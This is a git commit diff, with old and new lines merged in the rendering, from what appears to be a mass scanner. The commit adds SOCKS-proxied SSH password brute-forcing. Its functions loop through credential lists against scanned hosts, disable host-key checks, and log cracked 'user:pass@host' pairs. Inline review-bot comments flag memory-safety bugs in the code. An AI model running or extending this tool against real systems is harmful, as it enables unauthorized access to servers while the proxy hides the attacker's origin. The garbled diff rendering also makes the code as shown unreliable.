Partially implemented ssh over socks

cora48 2015-03-27 16:38:53 +03:00
parent a17df57d90
commit ff816f4645
4 changed files with 118 additions and 65 deletions


@ -416,7 +416,6 @@ void updateList(const char *fileName, long *szPtr, void *funcPtr(void)) {
long sz = getFileSize(fileName); long sz = getFileSize(fileName);
if(sz != *szPtr) { if(sz != *szPtr) {
FileUpdater::lk = std::unique_lock<std::mutex> (FileUpdater::filesUpdatingMutex); FileUpdater::lk = std::unique_lock<std::mutex> (FileUpdater::filesUpdatingMutex);
*szPtr = sz; *szPtr = sz;
funcPtr(); funcPtr();
@ -428,13 +427,26 @@ void updateList(const char *fileName, long *szPtr, void *funcPtr(void)) {
int FileUpdater::updateLists() { int FileUpdater::updateLists() {
while(globalScanFlag) { while(globalScanFlag) {
Sleep(60000);
if(!globalScanFlag) break;
loadOnce();
}
}
int FileUpdater::loadOnce() {
updateList("negatives.txt", &oldNegLstSize, updateNegatives); updateList("negatives.txt", &oldNegLstSize, updateNegatives);
updateList("login.txt", &oldLoginLstSize, updateLogin); updateList("login.txt", &oldLoginLstSize, updateLogin);
updateList("pass.txt", &oldPassLstSize, updatePass); updateList("pass.txt", &oldPassLstSize, updatePass);
updateList("sshpass.txt", &oldSSHLstSize, updateSSH); updateList("sshpass.txt", &oldSSHLstSize, updateSSH);
updateList("wflogin.txt", &oldWFLoginLstSize, updateWFLogin); updateList("wflogin.txt", &oldWFLoginLstSize, updateWFLogin);
updateList("wfpass.txt", &oldWFPassLstSize, updateWFPass); updateList("wfpass.txt", &oldWFPassLstSize, updateWFPass);
}
Sleep(60000); void FileUpdater::FUClear() {
} oldNegLstSize = 0;
oldLoginLstSize = 0;
oldPassLstSize = 0;
oldSSHLstSize = 0;
oldWFLoginLstSize = 0;
oldWFPassLstSize = 0;
} }
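Review bot: `FileUpdater::updateLists()` and the new `FileUpdater::loadOnce()` are declared `int`, but as rendered here neither body contains a `return`, and flowing off the end of a non-void function is undefined behaviour in C++. Either add `return 0;` at the end of each, or declare both `void` in the header and in this file. Separately, `FUClear()` resets the `old*LstSize` counters without taking `filesUpdatingMutex`; if the updater thread can still be inside `loadOnce()` when cleanup runs, those writes race, so it is worth confirming that the thread is stopped first.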


@ -26,8 +26,8 @@ public:
public: public:
static int updateLists(); static int updateLists();
static void passLoginLoader(); static int loadOnce();
static void negativeLoader(); static void FUClear();
}; };
#endif // FILEUPDATER_H #endif // FILEUPDATER_H


@ -1,54 +1,97 @@
#include "SSHAuth.h" #include "SSHAuth.h"
#include "FileUpdater.h" #include "FileUpdater.h"
int _sshConnect(char *user, char *pass, const char *host, int port) int _sshConnect(const char *user, const char *pass, const char *host, int port) {
{
CURL *curl = curl_easy_init();
curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 0L);
char hostStr[128] = {0}; char hostStr[128] = {0};
ZeroMemory(hostStr, sizeof(hostStr)); ZeroMemory(hostStr, sizeof(hostStr));
strcpy(hostStr, user); strcpy(hostStr, user);
strcat(hostStr, "@"); strcat(hostStr, "@");
strcat(hostStr, host); strcat(hostStr, host);
int sshTimeout = gTimeOut + 1;
ssh_session my_ssh_session = ssh_new(); if (curl)
if (my_ssh_session == NULL)
{ {
ssh_free(my_ssh_session); curl_easy_setopt(curl, CURLOPT_URL, host);
curl_easy_setopt(curl, CURLOPT_PORT, port);
curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);
curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L);
int proxyPort = std::atoi(gProxyPort);
if(strlen(gProxyIP) != 0 && (proxyPort > 0 && proxyPort < 65535)) {
curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP);
curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort);
} else {
curl_easy_setopt(curl, CURLOPT_PROXY, "");
}
curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut);
curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut);
curl_easy_setopt(curl, CURLOPT_CONNECT_ONLY, 1L);
int res = curl_easy_perform(curl);
socket_t sock;
curl_easy_getinfo(curl, CURLINFO_LASTSOCKET, &sock);
if(res != CURLE_OK) {
curl_easy_cleanup(curl);
++ssh;
stt->doEmitionRedFoundData("[SSH]Cannot connect to: " + QString(host) + ":" + QString::number(port));
return 0;
}
if(sock != -1) {
ssh_session ssh_session = ssh_new();
if (ssh_session == NULL)
{
ssh_free(ssh_session);
curl_easy_cleanup(curl);
return -1; return -1;
}; };
ssh_options_set(my_ssh_session, SSH_OPTIONS_HOST, hostStr); ssh_options_set(ssh_session, SSH_OPTIONS_STRICTHOSTKEYCHECK, 0);
ssh_options_set(my_ssh_session, SSH_OPTIONS_PORT, &port); ssh_options_set(ssh_session, SSH_OPTIONS_GSSAPI_DELEGATE_CREDENTIALS, 0);
ssh_options_set(my_ssh_session, SSH_OPTIONS_STRICTHOSTKEYCHECK, 0); ssh_options_set(ssh_session, SSH_OPTIONS_TIMEOUT, &sshTimeout);
ssh_options_set(my_ssh_session, SSH_OPTIONS_GSSAPI_DELEGATE_CREDENTIALS, 0);
ssh_options_set(my_ssh_session, SSH_OPTIONS_TIMEOUT, &(gTimeOut + 1));
int rc = ssh_connect(my_ssh_session); //Fails to work on libssh-4.5 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=688700
res = ssh_options_set(ssh_session, SSH_OPTIONS_FD, &sock);
if (rc != SSH_OK) res = ssh_connect(ssh_session);
if (res != SSH_OK) //Offline
{ {
ssh_disconnect(my_ssh_session); ssh_disconnect(ssh_session);
ssh_free(my_ssh_session); ssh_free(ssh_session);
curl_easy_cleanup(curl);
++offlines; ++offlines;
return -2; return -2;
} }
else else
{ {
rc = ssh_userauth_password(my_ssh_session, NULL, pass); res = ssh_userauth_password(ssh_session, NULL, pass);
if (rc != SSH_AUTH_SUCCESS) if (res != SSH_AUTH_SUCCESS)
{ {
ssh_disconnect(my_ssh_session); ssh_disconnect(ssh_session);
ssh_free(my_ssh_session); ssh_free(ssh_session);
curl_easy_cleanup(curl);
return -1; return -1;
}; };
}; };
ssh_disconnect(my_ssh_session);
ssh_free(my_ssh_session); ssh_disconnect(ssh_session);
ssh_free(ssh_session);
} else {
stt->doEmitionRedFoundData("[SSH]Socket = -1 " + QString(host) + ":" + QString::number(port));
}
}
curl_easy_cleanup(curl);
++ssh; ++ssh;
return 0; return 0;
} }
char _get_ssh_banner(const char *ip, int port) char _get_ssh_banner(const char *ip, int port) {
{
char recvBuff[256] = {0}; char recvBuff[256] = {0};
std::string buffer; std::string buffer;
Connector::nConnect(ip, port, &buffer); Connector::nConnect(ip, port, &buffer);
@ -63,14 +106,17 @@ char _get_ssh_banner(const char *ip, int port)
return *recvBuff; return *recvBuff;
} }
int check_ssh_pass(char *user, char *pass, char *userPass, const char *host, int port, std::string *buffer, const char *banner) int check_ssh_pass(const char *user, const char *pass,
{ const char *userPass, const char *host, int port,
std::string *buffer, const char *banner) {
int res = -1; int res = -1;
if(BALogSwitched) stt->doEmitionBAData("Probing SSH: " + QString(user) + ":" + QString(pass) + "@" + QString(host) + ":" + QString::number(port)); if(BALogSwitched) stt->doEmitionBAData("Probing SSH: " + QString(userPass) + "@" + QString(host) + ":" + QString::number(port));
res = _sshConnect(user, pass, host, port); res = _sshConnect(user, pass, host, port);
if(res == 0) if(res == 0)
{ {
stt->doEmition_BAGreenData("[+] SSH: " + QString(user) + ":" + QString(pass) + "@" + QString(host)); stt->doEmition_BAGreenData("[+] SSH: " + QString(userPass) + "@" + QString(host));
buffer->append(userPass); buffer->append(userPass);
buffer->append("@"); buffer->append("@");
buffer->append(host); buffer->append(host);
@ -78,22 +124,19 @@ int check_ssh_pass(char *user, char *pass, char *userPass, const char *host, int
buffer->append(banner); buffer->append(banner);
return 0; return 0;
}; };
return res; return res;
} }
int SSHBrute(const char* host, int port, std::string *buffer, const char *banner) int SSHBrute(const char* host, int port, std::string *buffer, const char *banner) {
{
char login[32] = {0}; char login[32] = {0};
char pass[32] = {0}; char pass[32] = {0};
char temp[64] = {0}; char temp[64] = {0};
BruteUtils::BConInc();
int sz = 0;
char *ptr1 = 0; char *ptr1 = 0;
int res = -1; int res = -1;
for(int i = 0; i < MaxSSHPass; ++i) for(int i = 0; i < MaxSSHPass; ++i)
{ {
FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready;});
if(!globalScanFlag) break; if(!globalScanFlag) break;
strcpy(temp, sshlpLst[i]); strcpy(temp, sshlpLst[i]);
ptr1 = strstr(temp, ":"); ptr1 = strstr(temp, ":");
@ -103,12 +146,9 @@ int SSHBrute(const char* host, int port, std::string *buffer, const char *banner
return -1; return -1;
} }
sz = ptr1 - temp; strncpy(login, temp, ptr1 - temp);
strncpy(login, temp, sz);
strcpy(pass, ptr1 + 1); strcpy(pass, ptr1 + 1);
res = check_ssh_pass(login, pass, temp, host, port, buffer, banner); res = check_ssh_pass(login, pass, temp, host, port, buffer, banner);
ZeroMemory(login, sizeof(login)); ZeroMemory(login, sizeof(login));
ZeroMemory(pass, sizeof(pass)); ZeroMemory(pass, sizeof(pass));
ZeroMemory(temp, sizeof(temp)); ZeroMemory(temp, sizeof(temp));
@ -116,18 +156,15 @@ int SSHBrute(const char* host, int port, std::string *buffer, const char *banner
if(res == 0) if(res == 0)
{ {
if(i == 0) return -2; //Failhit if(i == 0) return -2; //Failhit
BruteUtils::BConDec();
return 1; return 1;
} }
else if(res == -2) else if(res == -2)
{ {
BruteUtils::BConDec();
return -2; return -2;
}; };
Sleep(500); Sleep(500);
}; };
BruteUtils::BConDec();
return -1; return -1;
} }
@ -138,7 +175,10 @@ int SSHAuth::SSHLobby(const char *ip, int port, std::string *buffer)
const char &banner = _get_ssh_banner(ip, port); const char &banner = _get_ssh_banner(ip, port);
if(strlen(&banner) > 0) if(strlen(&banner) > 0)
{ {
return SSHBrute(ip, port, buffer, &banner); BruteUtils::BConInc();
int res = SSHBrute(ip, port, buffer, &banner);
BruteUtils::BConDec();
return res;
}; };
return -1; return -1;
} }
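Review bot: In `_sshConnect`, `socket_t sock` is passed to `curl_easy_getinfo(curl, CURLINFO_LASTSOCKET, &sock)`, but libcurl writes a `long` through that pointer; on platforms where `socket_t` and `long` differ in size this either writes past `sock` on the stack or leaves part of it uninitialised, and `sock` has no defined value if the call fails. Read into a `long` first, e.g. `long lastSock = -1; curl_easy_getinfo(curl, CURLINFO_LASTSOCKET, &lastSock); socket_t sock = (socket_t)lastSock;`, and do it only after the `res != CURLE_OK` check. The same file still copies without bounds: `strncpy(login, temp, ptr1 - temp)` in `SSHBrute` takes its length from the source line rather than from `sizeof(login)`, so an `sshlpLst` entry whose login part exceeds 31 bytes overruns `login[32]`, and `strcpy(pass, ptr1 + 1)` does the same for `pass[32]`; bound both copies by the destination size and skip over-long entries. In `SSHLobby`, `strlen(&banner)` is applied to the address of a single `char` returned by value from `_get_ssh_banner`, which reads past that object.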


@ -1825,7 +1825,7 @@ int startScan(char* args) {
stt->doEmitionIPRANGE(QString("--")); stt->doEmitionIPRANGE(QString("--"));
stt->doEmitionThreads(QString::number(0) + "/" + QString::number(gThreads)); stt->doEmitionThreads(QString::number(0) + "/" + QString::number(gThreads));
FileUpdater::loadOnce();
runAuxiliaryThreads(); runAuxiliaryThreads();
if (gMode == 0) if (gMode == 0)
@ -2115,6 +2115,7 @@ int startScan(char* args) {
} }
void nCleanup(){ void nCleanup(){
FileUpdater::FUClear();
Threader::cleanUp(); Threader::cleanUp();
curl_global_cleanup(); curl_global_cleanup();